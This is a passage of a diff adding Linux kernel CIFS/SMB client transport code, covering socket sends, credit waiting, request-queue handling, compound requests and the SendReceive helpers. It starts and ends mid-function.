++			rqst_page_get_length(&rqst[j], i, &bvec.bv_len,
++					     &bvec.bv_offset);
++
++			iov_iter_bvec(&smb_msg.msg_iter, ITER_SOURCE,
++				      &bvec, 1, bvec.bv_len);
++			rc = smb_send_kvec(server, &smb_msg, &sent);
++			if (rc < 0)
++				break;
++
++			total_len += sent;
++		}
++	}
++
++unmask:
++	sigprocmask(SIG_SETMASK, &oldmask, NULL);
++
++	/*
++	 * If a signal is pending but we have already sent the whole packet to
++	 * the server, we need to return success status to allow a corresponding
++	 * mid entry to be kept in the pending requests queue, thus allowing
++	 * the client to handle responses from the server.
++	 *
++	 * If only part of the packet has been sent there is no need to hide
++	 * interrupt because the session will be reconnected anyway, so there
++	 * won't be any response from the server to handle.
++	 */
++
++	if (signal_pending(current) && (total_len != send_length)) {
++		cifs_dbg(FYI, "signal is pending after attempt to send\n");
++		rc = -ERESTARTSYS;
++	}
++
++	/* uncork it */
++	tcp_sock_set_cork(ssocket->sk, false);
++
++	if ((total_len > 0) && (total_len != send_length)) {
++		cifs_dbg(FYI, "partial send (wanted=%u sent=%zu): terminating session\n",
++			 send_length, total_len);
++		/*
++		 * If we have only sent part of an SMB then the next SMB could
++		 * be taken as the remainder of this one. We need to kill the
++		 * socket so the server throws away the partial SMB
++		 */
++		cifs_signal_cifsd_for_reconnect(server, false);
++		trace_smb3_partial_send_reconnect(server->CurrentMid,
++						  server->conn_id, server->hostname);
++	}
++smbd_done:
++	if (rc < 0 && rc != -EINTR)
++		cifs_server_dbg(VFS, "Error %d sending data on socket to server\n",
++			 rc);
++	else if (rc > 0)
++		rc = 0;
++out:
++	cifs_in_send_dec(server);
++	return rc;
++}
++
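++/*
++ * Send the request(s); if CIFS_TRANSFORM_REQ is set, first wrap them in a
++ * transform header and encrypt them via the init_transform_rq callback.
++ */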
++static int
++smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
++	      struct smb_rqst *rqst, int flags)
++{
++	struct kvec iov;
++	struct smb2_transform_hdr *tr_hdr;
++	struct smb_rqst cur_rqst[MAX_COMPOUND];
++	int rc;
++
++	if (!(flags & CIFS_TRANSFORM_REQ))
++		return __smb_send_rqst(server, num_rqst, rqst);
++
++	if (num_rqst > MAX_COMPOUND - 1)
++		return -ENOMEM;
++
++	if (!server->ops->init_transform_rq) {
++		cifs_server_dbg(VFS, "Encryption requested but transform callback is missing\n");
++		return -EIO;
++	}
++
++	tr_hdr = kzalloc(sizeof(*tr_hdr), GFP_NOFS);
++	if (!tr_hdr)
++		return -ENOMEM;
++
++	memset(&cur_rqst[0], 0, sizeof(cur_rqst));
++	memset(&iov, 0, sizeof(iov));
++
++	iov.iov_base = tr_hdr;
++	iov.iov_len = sizeof(*tr_hdr);
++	cur_rqst[0].rq_iov = &iov;
++	cur_rqst[0].rq_nvec = 1;
++
++	rc = server->ops->init_transform_rq(server, num_rqst + 1,
++					    &cur_rqst[0], rqst);
++	if (rc)
++		goto out;
++
++	rc = __smb_send_rqst(server, num_rqst + 1, &cur_rqst[0]);
++	smb3_free_compound_rqst(num_rqst, &cur_rqst[1]);
++out:
++	kfree(tr_hdr);
++	return rc;
++}
++
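++/* Send a single SMB buffer whose first four bytes hold the RFC 1002 length */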
++int
++smb_send(struct TCP_Server_Info *server, struct smb_hdr *smb_buffer,
++	 unsigned int smb_buf_length)
++{
++	struct kvec iov[2];
++	struct smb_rqst rqst = { .rq_iov = iov,
++				 .rq_nvec = 2 };
++
++	iov[0].iov_base = smb_buffer;
++	iov[0].iov_len = 4;
++	iov[1].iov_base = (char *)smb_buffer + 4;
++	iov[1].iov_len = smb_buf_length;
++
++	return __smb_send_rqst(server, 1, &rqst);
++}
++
++static int
++wait_for_free_credits(struct TCP_Server_Info *server, const int num_credits,
++		      const int timeout, const int flags,
++		      unsigned int *instance)
++{
++	long rc;
++	int *credits;
++	int optype;
++	long int t;
++	int scredits, in_flight;
++
++	if (timeout < 0)
++		t = MAX_JIFFY_OFFSET;
++	else
++		t = msecs_to_jiffies(timeout);
++
++	optype = flags & CIFS_OP_MASK;
++
++	*instance = 0;
++
++	credits = server->ops->get_credits_field(server, optype);
++	/* Since an echo is already in flight, no need to wait to send another */
++	if (*credits <= 0 && optype == CIFS_ECHO_OP)
++		return -EAGAIN;
++
++	spin_lock(&server->req_lock);
++	if ((flags & CIFS_TIMEOUT_MASK) == CIFS_NON_BLOCKING) {
++		/* oplock breaks must not be held up */
++		server->in_flight++;
++		if (server->in_flight > server->max_in_flight)
++			server->max_in_flight = server->in_flight;
++		*credits -= 1;
++		*instance = server->reconnect_instance;
++		scredits = *credits;
++		in_flight = server->in_flight;
++		spin_unlock(&server->req_lock);
++
++		trace_smb3_nblk_credits(server->CurrentMid,
++				server->conn_id, server->hostname, scredits, -1, in_flight);
++		cifs_dbg(FYI, "%s: remove %u credits total=%d\n",
++				__func__, 1, scredits);
++
++		return 0;
++	}
++
++	while (1) {
++		if (*credits < num_credits) {
++			scredits = *credits;
++			spin_unlock(&server->req_lock);
++
++			cifs_num_waiters_inc(server);
++			rc = wait_event_killable_timeout(server->request_q,
++				has_credits(server, credits, num_credits), t);
++			cifs_num_waiters_dec(server);
++			if (!rc) {
++				spin_lock(&server->req_lock);
++				scredits = *credits;
++				in_flight = server->in_flight;
++				spin_unlock(&server->req_lock);
++
++				trace_smb3_credit_timeout(server->CurrentMid,
++						server->conn_id, server->hostname, scredits,
++						num_credits, in_flight);
++				cifs_server_dbg(VFS, "wait timed out after %d ms\n",
++						timeout);
++				return -EBUSY;
++			}
++			if (rc == -ERESTARTSYS)
++				return -ERESTARTSYS;
++			spin_lock(&server->req_lock);
++		} else {
++			spin_unlock(&server->req_lock);
++
++			spin_lock(&server->srv_lock);
++			if (server->tcpStatus == CifsExiting) {
++				spin_unlock(&server->srv_lock);
++				return -ENOENT;
++			}
++			spin_unlock(&server->srv_lock);
++
++			/*
++			 * For normal commands, reserve the last MAX_COMPOUND
++			 * credits for compound requests.
++			 * Otherwise these compounds could be permanently
++			 * starved for credits by single-credit requests.
++			 *
++			 * To prevent spinning the CPU, block this thread until
++			 * there are >MAX_COMPOUND credits available.
++			 * But only do this if we already have a lot of
++			 * requests in flight, to avoid triggering this check
++			 * for servers that are slow to hand out credits on
++			 * new sessions.
++			 */
++			spin_lock(&server->req_lock);
++			if (!optype && num_credits == 1 &&
++			    server->in_flight > 2 * MAX_COMPOUND &&
++			    *credits <= MAX_COMPOUND) {
++				spin_unlock(&server->req_lock);
++
++				cifs_num_waiters_inc(server);
++				rc = wait_event_killable_timeout(
++					server->request_q,
++					has_credits(server, credits,
++						    MAX_COMPOUND + 1),
++					t);
++				cifs_num_waiters_dec(server);
++				if (!rc) {
++					spin_lock(&server->req_lock);
++					scredits = *credits;
++					in_flight = server->in_flight;
++					spin_unlock(&server->req_lock);
++
++					trace_smb3_credit_timeout(
++							server->CurrentMid,
++							server->conn_id, server->hostname,
++							scredits, num_credits, in_flight);
++					cifs_server_dbg(VFS, "wait timed out after %d ms\n",
++							timeout);
++					return -EBUSY;
++				}
++				if (rc == -ERESTARTSYS)
++					return -ERESTARTSYS;
++				spin_lock(&server->req_lock);
++				continue;
++			}
++
++			/*
++			 * Cannot count locking commands against the total
++			 * as they are allowed to block on the server.
++			 */
++
++			/* update # of requests on the wire to server */
++			if ((flags & CIFS_TIMEOUT_MASK) != CIFS_BLOCKING_OP) {
++				*credits -= num_credits;
++				server->in_flight += num_credits;
++				if (server->in_flight > server->max_in_flight)
++					server->max_in_flight = server->in_flight;
++				*instance = server->reconnect_instance;
++			}
++			scredits = *credits;
++			in_flight = server->in_flight;
++			spin_unlock(&server->req_lock);
++
++			trace_smb3_waitff_credits(server->CurrentMid,
++					server->conn_id, server->hostname, scredits,
++					-(num_credits), in_flight);
++			cifs_dbg(FYI, "%s: remove %u credits total=%d\n",
++					__func__, num_credits, scredits);
++			break;
++		}
++	}
++	return 0;
++}
++
++static int
++wait_for_free_request(struct TCP_Server_Info *server, const int flags,
++		      unsigned int *instance)
++{
++	return wait_for_free_credits(server, 1, -1, flags,
++				     instance);
++}
++
++static int
++wait_for_compound_request(struct TCP_Server_Info *server, int num,
++			  const int flags, unsigned int *instance)
++{
++	int *credits;
++	int scredits, in_flight;
++
++	credits = server->ops->get_credits_field(server, flags & CIFS_OP_MASK);
++
++	spin_lock(&server->req_lock);
++	scredits = *credits;
++	in_flight = server->in_flight;
++
++	if (*credits < num) {
++		/*
++		 * If the server is tight on resources or just gives us fewer
++		 * credits for other reasons (e.g. requests are coming out of
++		 * order and the server delays granting more credits until it
++		 * processes a missing mid) and we exhausted most available
++		 * credits, there may be situations when we try to send
++		 * a compound request but we don't have enough credits. At this
++		 * point the client needs to decide if it should wait for
++		 * additional credits or fail the request. If at least one
++		 * request is in flight there is a high probability that the
++		 * server will return enough credits to satisfy this compound
++		 * request.
++		 *
++		 * Return immediately if no requests in flight since we will be
++		 * stuck on waiting for credits.
++		 */
++		if (server->in_flight == 0) {
++			spin_unlock(&server->req_lock);
++			trace_smb3_insufficient_credits(server->CurrentMid,
++					server->conn_id, server->hostname, scredits,
++					num, in_flight);
++			cifs_dbg(FYI, "%s: %d requests in flight, needed %d total=%d\n",
++					__func__, in_flight, num, scredits);
++			return -EDEADLK;
++		}
++	}
++	spin_unlock(&server->req_lock);
++
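++	/* wait up to 60 seconds for the credits to become available */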
++	return wait_for_free_credits(server, num, 60000, flags,
++				     instance);
++}
++
++int
++cifs_wait_mtu_credits(struct TCP_Server_Info *server, unsigned int size,
++		      unsigned int *num, struct cifs_credits *credits)
++{
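++	/* SMB1 does not use MTU credits: grant the full size, zero credits */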
++	*num = size;
++	credits->value = 0;
++	credits->instance = server->reconnect_instance;
++	return 0;
++}
++
++static int allocate_mid(struct cifs_ses *ses, struct smb_hdr *in_buf,
++			struct mid_q_entry **ppmidQ)
++{
++	spin_lock(&ses->ses_lock);
++	if (ses->ses_status == SES_NEW) {
++		if ((in_buf->Command != SMB_COM_SESSION_SETUP_ANDX) &&
++			(in_buf->Command != SMB_COM_NEGOTIATE)) {
++			spin_unlock(&ses->ses_lock);
++			return -EAGAIN;
++		}
++		/* else ok - we are setting up session */
++	}
++
++	if (ses->ses_status == SES_EXITING) {
++		/* the session is exiting; only a logoff request may be sent */
++		if (in_buf->Command != SMB_COM_LOGOFF_ANDX) {
++			spin_unlock(&ses->ses_lock);
++			return -EAGAIN;
++		}
++		/* else ok - we are shutting down session */
++	}
++	spin_unlock(&ses->ses_lock);
++
++	*ppmidQ = alloc_mid(in_buf, ses->server);
++	if (*ppmidQ == NULL)
++		return -ENOMEM;
++	spin_lock(&ses->server->mid_lock);
++	list_add_tail(&(*ppmidQ)->qhead, &ses->server->pending_mid_q);
++	spin_unlock(&ses->server->mid_lock);
++	return 0;
++}
++
++static int
++wait_for_response(struct TCP_Server_Info *server, struct mid_q_entry *midQ)
++{
++	int error;
++
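++	/* killable, freezable wait until the mid leaves the submitted state */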
++	error = wait_event_state(server->response_q,
++				 midQ->mid_state != MID_REQUEST_SUBMITTED,
++				 (TASK_KILLABLE|TASK_FREEZABLE_UNSAFE));
++	if (error < 0)
++		return -ERESTARTSYS;
++
++	return 0;
++}
++
++struct mid_q_entry *
++cifs_setup_async_request(struct TCP_Server_Info *server, struct smb_rqst *rqst)
++{
++	int rc;
++	struct smb_hdr *hdr = (struct smb_hdr *)rqst->rq_iov[0].iov_base;
++	struct mid_q_entry *mid;
++
++	if (rqst->rq_iov[0].iov_len != 4 ||
++	    rqst->rq_iov[0].iov_base + 4 != rqst->rq_iov[1].iov_base)
++		return ERR_PTR(-EIO);
++
++	/* enable signing if server requires it */
++	if (server->sign)
++		hdr->Flags2 |= SMBFLG2_SECURITY_SIGNATURE;
++
++	mid = alloc_mid(hdr, server);
++	if (mid == NULL)
++		return ERR_PTR(-ENOMEM);
++
++	rc = cifs_sign_rqst(rqst, server, &mid->sequence_number);
++	if (rc) {
++		release_mid(mid);
++		return ERR_PTR(rc);
++	}
++
++	return mid;
++}
++
++/*
++ * Send an SMB request and set the callback function in the mid to handle
++ * the result. Caller is responsible for dealing with timeouts.
++ */
++int
++cifs_call_async(struct TCP_Server_Info *server, struct smb_rqst *rqst,
++		mid_receive_t *receive, mid_callback_t *callback,
++		mid_handle_t *handle, void *cbdata, const int flags,
++		const struct cifs_credits *exist_credits)
++{
++	int rc;
++	struct mid_q_entry *mid;
++	struct cifs_credits credits = { .value = 0, .instance = 0 };
++	unsigned int instance;
++	int optype;
++
++	optype = flags & CIFS_OP_MASK;
++
++	if ((flags & CIFS_HAS_CREDITS) == 0) {
++		rc = wait_for_free_request(server, flags, &instance);
++		if (rc)
++			return rc;
++		credits.value = 1;
++		credits.instance = instance;
++	} else
++		instance = exist_credits->instance;
++
++	cifs_server_lock(server);
++
++	/*
++	 * We can't use credits obtained from the previous session to send this
++	 * request. Check if there were reconnects after we obtained credits and
++	 * return -EAGAIN in such cases to let callers handle it.
++	 */
++	if (instance != server->reconnect_instance) {
++		cifs_server_unlock(server);
++		add_credits_and_wake_if(server, &credits, optype);
++		return -EAGAIN;
++	}
++
++	mid = server->ops->setup_async_request(server, rqst);
++	if (IS_ERR(mid)) {
++		cifs_server_unlock(server);
++		add_credits_and_wake_if(server, &credits, optype);
++		return PTR_ERR(mid);
++	}
++
++	mid->receive = receive;
++	mid->callback = callback;
++	mid->callback_data = cbdata;
++	mid->handle = handle;
++	mid->mid_state = MID_REQUEST_SUBMITTED;
++
++	/* put it on the pending_mid_q */
++	spin_lock(&server->mid_lock);
++	list_add_tail(&mid->qhead, &server->pending_mid_q);
++	spin_unlock(&server->mid_lock);
++
++	/*
++	 * Need to store the time in mid before calling I/O. For call_async,
++	 * I/O response may come back and free the mid entry on another thread.
++	 */
++	cifs_save_when_sent(mid);
++	rc = smb_send_rqst(server, 1, rqst, flags);
++
++	if (rc < 0) {
++		revert_current_mid(server, mid->credits);
++		server->sequence_number -= 2;
++		delete_mid(mid);
++	}
++
++	cifs_server_unlock(server);
++
++	if (rc == 0)
++		return 0;
++
++	add_credits_and_wake_if(server, &credits, optype);
++	return rc;
++}
++
++/*
++ * Send an SMB request.  No response info (other than the return code)
++ * needs to be parsed.
++ *
++ * flags indicate the type of request buffer, how long to wait, and whether
++ * to log the NT STATUS code (error) before mapping it to a POSIX error.
++ */
++int
++SendReceiveNoRsp(const unsigned int xid, struct cifs_ses *ses,
++		 char *in_buf, int flags)
++{
++	int rc;
++	struct kvec iov[1];
++	struct kvec rsp_iov;
++	int resp_buf_type;
++
++	iov[0].iov_base = in_buf;
++	iov[0].iov_len = get_rfc1002_length(in_buf) + 4;
++	flags |= CIFS_NO_RSP_BUF;
++	rc = SendReceive2(xid, ses, iov, 1, &resp_buf_type, flags, &rsp_iov);
++	cifs_dbg(NOISY, "SendRcvNoRsp flags %d rc %d\n", flags, rc);
++
++	return rc;
++}
++
++static int
++cifs_sync_mid_result(struct mid_q_entry *mid, struct TCP_Server_Info *server)
++{
++	int rc = 0;
++
++	cifs_dbg(FYI, "%s: cmd=%d mid=%llu state=%d\n",
++		 __func__, le16_to_cpu(mid->command), mid->mid, mid->mid_state);
++
++	spin_lock(&server->mid_lock);
++	switch (mid->mid_state) {
++	case MID_RESPONSE_RECEIVED:
++		spin_unlock(&server->mid_lock);
++		return rc;
++	case MID_RETRY_NEEDED:
++		rc = -EAGAIN;
++		break;
++	case MID_RESPONSE_MALFORMED:
++		rc = -EIO;
++		break;
++	case MID_SHUTDOWN:
++		rc = -EHOSTDOWN;
++		break;
++	default:
++		if (!(mid->mid_flags & MID_DELETED)) {
++			list_del_init(&mid->qhead);
++			mid->mid_flags |= MID_DELETED;
++		}
++		cifs_server_dbg(VFS, "%s: invalid mid state mid=%llu state=%d\n",
++			 __func__, mid->mid, mid->mid_state);
++		rc = -EIO;
++	}
++	spin_unlock(&server->mid_lock);
++
++	release_mid(mid);
++	return rc;
++}
++
++static inline int
++send_cancel(struct TCP_Server_Info *server, struct smb_rqst *rqst,
++	    struct mid_q_entry *mid)
++{
++	return server->ops->send_cancel ?
++				server->ops->send_cancel(server, rqst, mid) : 0;
++}
++
++int
++cifs_check_receive(struct mid_q_entry *mid, struct TCP_Server_Info *server,
++		   bool log_error)
++{
++	unsigned int len = get_rfc1002_length(mid->resp_buf) + 4;
++
++	dump_smb(mid->resp_buf, min_t(u32, 92, len));
++
++	/* verify the signature if this connection requires signing */
++	if (server->sign) {
++		struct kvec iov[2];
++		int rc = 0;
++		struct smb_rqst rqst = { .rq_iov = iov,
++					 .rq_nvec = 2 };
++
++		iov[0].iov_base = mid->resp_buf;
++		iov[0].iov_len = 4;
++		iov[1].iov_base = (char *)mid->resp_buf + 4;
++		iov[1].iov_len = len - 4;
++		/* FIXME: add code to kill session */
++		rc = cifs_verify_signature(&rqst, server,
++					   mid->sequence_number);
++		if (rc)
++			cifs_server_dbg(VFS, "SMB signature verification returned error = %d\n",
++				 rc);
++	}
++
++	/* BB special case reconnect tid and uid here? */
++	return map_and_check_smb_error(mid, log_error);
++}
++
++struct mid_q_entry *
++cifs_setup_request(struct cifs_ses *ses, struct TCP_Server_Info *ignored,
++		   struct smb_rqst *rqst)
++{
++	int rc;
++	struct smb_hdr *hdr = (struct smb_hdr *)rqst->rq_iov[0].iov_base;
++	struct mid_q_entry *mid;
++
++	if (rqst->rq_iov[0].iov_len != 4 ||
++	    rqst->rq_iov[0].iov_base + 4 != rqst->rq_iov[1].iov_base)
++		return ERR_PTR(-EIO);
++
++	rc = allocate_mid(ses, hdr, &mid);
++	if (rc)
++		return ERR_PTR(rc);
++	rc = cifs_sign_rqst(rqst, ses->server, &mid->sequence_number);
++	if (rc) {
++		delete_mid(mid);
++		return ERR_PTR(rc);
++	}
++	return mid;
++}
++
++static void
++cifs_compound_callback(struct mid_q_entry *mid)
++{
++	struct TCP_Server_Info *server = mid->server;
++	struct cifs_credits credits;
++
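++	/* return the credits granted in this response to the server's pool */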
++	credits.value = server->ops->get_credits(mid);
++	credits.instance = server->reconnect_instance;
++
++	add_credits(server, &credits, mid->optype);
++}
++
++static void
++cifs_compound_last_callback(struct mid_q_entry *mid)
++{
++	cifs_compound_callback(mid);
++	cifs_wake_up_task(mid);
++}
++
++static void
++cifs_cancelled_callback(struct mid_q_entry *mid)
++{
++	cifs_compound_callback(mid);
++	release_mid(mid);
++}
++
++/*
++ * Return a channel (master if none) of @ses that can be used to send
++ * regular requests.
++ *
++ * If we are currently binding a new channel (negprot/sess.setup),
++ * return the new incomplete channel.
++ */
++struct TCP_Server_Info *cifs_pick_channel(struct cifs_ses *ses)
++{
++	uint index = 0;
++
++	if (!ses)
++		return NULL;
++
++	/* round robin */
++	index = (uint)atomic_inc_return(&ses->chan_seq);
++
++	spin_lock(&ses->chan_lock);
++	index %= ses->chan_count;
++	spin_unlock(&ses->chan_lock);
++
++	return ses->chans[index].server;
++}
++
++int
++compound_send_recv(const unsigned int xid, struct cifs_ses *ses,
++		   struct TCP_Server_Info *server,
++		   const int flags, const int num_rqst, struct smb_rqst *rqst,
++		   int *resp_buf_type, struct kvec *resp_iov)
++{
++	int i, j, optype, rc = 0;
++	struct mid_q_entry *midQ[MAX_COMPOUND];
++	bool cancelled_mid[MAX_COMPOUND] = {false};
++	struct cifs_credits credits[MAX_COMPOUND] = {
++		{ .value = 0, .instance = 0 }
++	};
++	unsigned int instance;
++	char *buf;
++
++	optype = flags & CIFS_OP_MASK;
++
++	for (i = 0; i < num_rqst; i++)
++		resp_buf_type[i] = CIFS_NO_BUFFER;  /* no response buf yet */
++
++	if (!ses || !ses->server || !server) {
++		cifs_dbg(VFS, "Null session\n");
++		return -EIO;
++	}
++
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus == CifsExiting) {
++		spin_unlock(&server->srv_lock);
++		return -ENOENT;
++	}
++	spin_unlock(&server->srv_lock);
++
++	/*
++	 * Wait for credits for all the requests to become available.
++	 * This approach still leaves the possibility of getting stuck waiting
++	 * for credits if the server doesn't grant credits to the outstanding
++	 * requests and the client is completely idle, not generating any
++	 * other requests.
++	 * This can be handled by the eventual session reconnect.
++	 */
++	rc = wait_for_compound_request(server, num_rqst, flags,
++				       &instance);
++	if (rc)
++		return rc;
++
++	for (i = 0; i < num_rqst; i++) {
++		credits[i].value = 1;
++		credits[i].instance = instance;
++	}
++
++	/*
++	 * Make sure that we sign in the same order that we send on this socket
++	 * and avoid races inside tcp sendmsg code that could cause corruption
++	 * of smb data.
++	 */
++
++	cifs_server_lock(server);
++
++	/*
++	 * All the parts of the compound chain must use credits obtained from
++	 * the same session. We cannot use credits obtained from a previous
++	 * session to send this request. Check if there were reconnects after
++	 * we obtained credits and return -EAGAIN in such cases to let callers
++	 * handle it.
++	 */
++	if (instance != server->reconnect_instance) {
++		cifs_server_unlock(server);
++		for (j = 0; j < num_rqst; j++)
++			add_credits(server, &credits[j], optype);
++		return -EAGAIN;
++	}
++
++	for (i = 0; i < num_rqst; i++) {
++		midQ[i] = server->ops->setup_request(ses, server, &rqst[i]);
++		if (IS_ERR(midQ[i])) {
++			revert_current_mid(server, i);
++			for (j = 0; j < i; j++)
++				delete_mid(midQ[j]);
++			cifs_server_unlock(server);
++
++			/* Update # of requests on wire to server */
++			for (j = 0; j < num_rqst; j++)
++				add_credits(server, &credits[j], optype);
++			return PTR_ERR(midQ[i]);
++		}
++
++		midQ[i]->mid_state = MID_REQUEST_SUBMITTED;
++		midQ[i]->optype = optype;
++		/*
++		 * Invoke callback for every part of the compound chain
++		 * to calculate credits properly. Wake up this thread only when
++		 * the last element is received.
++		 */
++		if (i < num_rqst - 1)
++			midQ[i]->callback = cifs_compound_callback;
++		else
++			midQ[i]->callback = cifs_compound_last_callback;
++	}
++	rc = smb_send_rqst(server, num_rqst, rqst, flags);
++
++	for (i = 0; i < num_rqst; i++)
++		cifs_save_when_sent(midQ[i]);
++
++	if (rc < 0) {
++		revert_current_mid(server, num_rqst);
++		server->sequence_number -= 2;
++	}
++
++	cifs_server_unlock(server);
++
++	/*
++	 * If sending failed for some reason, or it is an oplock break that we
++	 * will not receive a response to, return the credits back.
++	 */
++	if (rc < 0 || (flags & CIFS_NO_SRV_RSP)) {
++		for (i = 0; i < num_rqst; i++)
++			add_credits(server, &credits[i], optype);
++		goto out;
++	}
++
++	/*
++	 * At this point the request is passed to the network stack - we assume
++	 * that any credits taken from the server structure on the client have
++	 * been spent and we can't return them back. Once we receive responses
++	 * we will collect credits granted by the server in the mid callbacks
++	 * and add those credits to the server structure.
++	 */
++
++	/*
++	 * Compounding is never used during session establishment.
++	 */
++	spin_lock(&ses->ses_lock);
++	if ((ses->ses_status == SES_NEW) || (optype & CIFS_NEG_OP) || (optype & CIFS_SESS_OP)) {
++		spin_unlock(&ses->ses_lock);
++
++		cifs_server_lock(server);
++		smb311_update_preauth_hash(ses, server, rqst[0].rq_iov, rqst[0].rq_nvec);
++		cifs_server_unlock(server);
++
++		spin_lock(&ses->ses_lock);
++	}
++	spin_unlock(&ses->ses_lock);
++
++	for (i = 0; i < num_rqst; i++) {
++		rc = wait_for_response(server, midQ[i]);
++		if (rc != 0)
++			break;
++	}
++	if (rc != 0) {
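++		/* cancel the requests we stopped waiting on */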
++		for (; i < num_rqst; i++) {
++			cifs_server_dbg(FYI, "Cancelling wait for mid %llu cmd: %d\n",
++				 midQ[i]->mid, le16_to_cpu(midQ[i]->command));
++			send_cancel(server, &rqst[i], midQ[i]);
++			spin_lock(&server->mid_lock);
++			midQ[i]->mid_flags |= MID_WAIT_CANCELLED;
++			if (midQ[i]->mid_state == MID_REQUEST_SUBMITTED) {
++				midQ[i]->callback = cifs_cancelled_callback;
++				cancelled_mid[i] = true;
++				credits[i].value = 0;
++			}
++			spin_unlock(&server->mid_lock);
++		}
++	}
++
++	for (i = 0; i < num_rqst; i++) {
++		if (rc < 0)
++			goto out;
++
++		rc = cifs_sync_mid_result(midQ[i], server);
++		if (rc != 0) {
++			/* mark this mid as cancelled to not free it below */
++			cancelled_mid[i] = true;
++			goto out;
++		}
++
++		if (!midQ[i]->resp_buf ||
++		    midQ[i]->mid_state != MID_RESPONSE_RECEIVED) {
++			rc = -EIO;
++			cifs_dbg(FYI, "Bad MID state?\n");
++			goto out;
++		}
++
++		buf = (char *)midQ[i]->resp_buf;
++		resp_iov[i].iov_base = buf;
++		resp_iov[i].iov_len = midQ[i]->resp_buf_size +
++			HEADER_PREAMBLE_SIZE(server);
++
++		if (midQ[i]->large_buf)
++			resp_buf_type[i] = CIFS_LARGE_BUFFER;
++		else
++			resp_buf_type[i] = CIFS_SMALL_BUFFER;
++
++		rc = server->ops->check_receive(midQ[i], server,
++						     flags & CIFS_LOG_ERROR);
++
++		/* mark it so buf will not be freed by delete_mid */
++		if ((flags & CIFS_NO_RSP_BUF) == 0)
++			midQ[i]->resp_buf = NULL;
++
++	}
++
++	/*
++	 * Compounding is never used during session establishment.
++	 */
++	spin_lock(&ses->ses_lock);
++	if ((ses->ses_status == SES_NEW) || (optype & CIFS_NEG_OP) || (optype & CIFS_SESS_OP)) {
++		struct kvec iov = {
++			.iov_base = resp_iov[0].iov_base,
++			.iov_len = resp_iov[0].iov_len
++		};
++		spin_unlock(&ses->ses_lock);
++		cifs_server_lock(server);
++		smb311_update_preauth_hash(ses, server, &iov, 1);
++		cifs_server_unlock(server);
++		spin_lock(&ses->ses_lock);
++	}
++	spin_unlock(&ses->ses_lock);
++
++out:
++	/*
++	 * This will dequeue all mids. After this it is important that the
++	 * demultiplex_thread will not process any of these mids any further.
++	 * This is prevented above by using a noop callback that will not
++	 * wake this thread except for the very last PDU.
++	 */
++	for (i = 0; i < num_rqst; i++) {
++		if (!cancelled_mid[i])
++			delete_mid(midQ[i]);
++	}
++
++	return rc;
++}
++
++int
++cifs_send_recv(const unsigned int xid, struct cifs_ses *ses,
++	       struct TCP_Server_Info *server,
++	       struct smb_rqst *rqst, int *resp_buf_type, const int flags,
++	       struct kvec *resp_iov)
++{
++	return compound_send_recv(xid, ses, server, flags, 1,
++				  rqst, resp_buf_type, resp_iov);
++}
++
++int
++SendReceive2(const unsigned int xid, struct cifs_ses *ses,
++	     struct kvec *iov, int n_vec, int *resp_buf_type /* ret */,
++	     const int flags, struct kvec *resp_iov)
++{
++	struct smb_rqst rqst;
++	struct kvec s_iov[CIFS_MAX_IOV_SIZE], *new_iov;
++	int rc;
++
++	if (n_vec + 1 > CIFS_MAX_IOV_SIZE) {
++		new_iov = kmalloc_array(n_vec + 1, sizeof(struct kvec),
++					GFP_KERNEL);
++		if (!new_iov) {
++			/* otherwise cifs_send_recv below sets resp_buf_type */
++			*resp_buf_type = CIFS_NO_BUFFER;
++			return -ENOMEM;
++		}
++	} else
++		new_iov = s_iov;
++
++	/* 1st iov is a RFC1001 length followed by the rest of the packet */
++	memcpy(new_iov + 1, iov, (sizeof(struct kvec) * n_vec));
++
++	new_iov[0].iov_base = new_iov[1].iov_base;
++	new_iov[0].iov_len = 4;
++	new_iov[1].iov_base += 4;
++	new_iov[1].iov_len -= 4;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = new_iov;
++	rqst.rq_nvec = n_vec + 1;
++
++	rc = cifs_send_recv(xid, ses, ses->server,
++			    &rqst, resp_buf_type, flags, resp_iov);
++	if (n_vec + 1 > CIFS_MAX_IOV_SIZE)
++		kfree(new_iov);
++	return rc;
++}
++
++int
++SendReceive(const unsigned int xid, struct cifs_ses *ses,
++	    struct smb_hdr *in_buf, struct smb_hdr *out_buf,
++	    int *pbytes_returned, const int flags)
++{
++	int rc = 0;
++	struct mid_q_entry *midQ;
++	unsigned int len = be32_to_cpu(in_buf->smb_buf_length);
++	struct kvec iov = { .iov_base = in_buf, .iov_len = len };
++	struct smb_rqst rqst = { .rq_iov = &iov, .rq_nvec = 1 };
++	struct cifs_credits credits = { .value = 1, .instance = 0 };
++	struct TCP_Server_Info *server;
++
++	if (ses == NULL) {
++		cifs_dbg(VFS, "Null smb session\n");
++		return -EIO;
++	}
++	server = ses->server;
++	if (server == NULL) {
++		cifs_dbg(VFS, "Null tcp session\n");
++		return -EIO;
++	}
++
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus == CifsExiting) {
++		spin_unlock(&server->srv_lock);
++		return -ENOENT;
++	}
++	spin_unlock(&server->srv_lock);
++
++	/* Ensure that we do not send more than 50 overlapping requests
++	   to the same server. We may make this configurable later or
++	   use ses->maxReq */
++
++	if (len > CIFSMaxBufSize + MAX_CIFS_HDR_SIZE - 4) {
++		cifs_server_dbg(VFS, "Invalid length, greater than maximum frame, %d\n",
++				len);
++		return -EIO;
++	}
++
++	rc = wait_for_free_request(server, flags, &credits.instance);
++	if (rc)
++		return rc;
++
++	/* make sure that we sign in the same order that we send on this socket
++	   and avoid races inside tcp sendmsg code that could cause corruption
++	   of smb data */
++
++	cifs_server_lock(server);
++
++	rc = allocate_mid(ses, in_buf, &midQ);
++	if (rc) {
++		cifs_server_unlock(server);
++		/* Update # of requests on wire to server */
++		add_credits(server, &credits, 0);
++		return rc;
++	}
++
++	rc = cifs_sign_smb(in_buf, server, &midQ->sequence_number);
++	if (rc) {
++		cifs_server_unlock(server);
++		goto out;
++	}
++
++	midQ->mid_state = MID_REQUEST_SUBMITTED;
++
++	rc = smb_send(server, in_buf, len);
++	cifs_save_when_sent(midQ);
++
++	if (rc < 0)
++		server->sequence_number -= 2;
++
++	cifs_server_unlock(server);
++
++	if (rc < 0)
++		goto out;
++
++	rc = wait_for_response(server, midQ);
++	if (rc != 0) {
++		send_cancel(server, &rqst, midQ);
++		spin_lock(&server->mid_lock);
++		if (midQ->mid_state == MID_REQUEST_SUBMITTED) {
++			/* no longer considered to be "in-flight" */
++			midQ->callback = release_mid;
++			spin_unlock(&server->mid_lock);
